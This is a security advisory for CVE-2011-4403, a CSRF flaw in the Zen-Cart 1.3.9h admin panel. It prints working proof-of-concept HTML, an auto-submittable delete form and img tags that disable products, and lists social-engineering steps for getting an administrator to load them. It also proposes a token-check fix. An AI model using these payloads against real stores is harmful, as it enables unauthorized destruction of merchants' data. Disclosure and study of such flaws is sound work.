Vulmon
*Advisory Information*
Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products
Date published: 2012-02-10 01:59:45 AM
upSploit Ref: UPS-2011-0018
CVE REF: CVE-2011-4403
*Advisory Summary*
An attacker can force an administrator to delete or disable products from
within his store.
*Vendor*
Zen-Cart
*Affected Software*
Zen-Cart v1.3.9h
Zen Cart™ truly is the art of e-commerce; free, user-friendly, open source
shopping cart software. The ecommerce web site design program is being
developed by a group of like-minded shop owners, programmers, designers,
and consultants that think ecommerce web design could be and should be done
differently.
*Description of Issue*
This is a POC for CSRF on Zen-cart 1.3.9h admin control panel. By
submitting this form from any location an attacker can cause the
administrator to delete / disable products from his store.
*PoC*
Requirements
1. Admin user (target) must have a valid session id. Even if they have
closed the admin window, this attack is still successful
2. The attacker must obtain the admin url
* Social Engineer an admin user (trick them)
* Packet Capture
* Email headers
* Invoice print out
* * I know these have been addressed in your security forum topics,
but most users are not aware of these issues
3. The attacker must obtain the product id
* This is public information
4. The attack must then social engineer (trick them) into loading the page
* Email with images
* Post a forum topic with the images
* Link them to a page on the attacker’s server
Proof of Concept
Delete:
This form can be hidden and made to submit automatically on page load:
<form name="products" action="
http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm"
method="post">
<label for="securityToken">Security Token</label><br/><input type="text"
name="securityToken" value="Can be anything…" /><br/><br/>
<label for="products_id">Products ID</label><br/><input type="text"
name="products_id" value="329"><br/><br/>
<label for="product_categories[]">Products Category</label><br/><input
type="text" value="48" name="product_categories[]"><br/><br/>
<input type="submit" border="0" alt="Delete" value=" Delete Product">
</form>
Disable:
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=1
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=2
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=3
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=4
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=5
"/>
Proposed Solution
* Add the security token conditional statement to the
delete_product_confirm.php for all product types
* This should be applied to all requests made within the admin control
panel rather than just key operations
*Credits*
DisK0nn3cT
*References*
http://www.zen-cart.com/
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)
*Patch/Fix*
Update to the latest version
<p>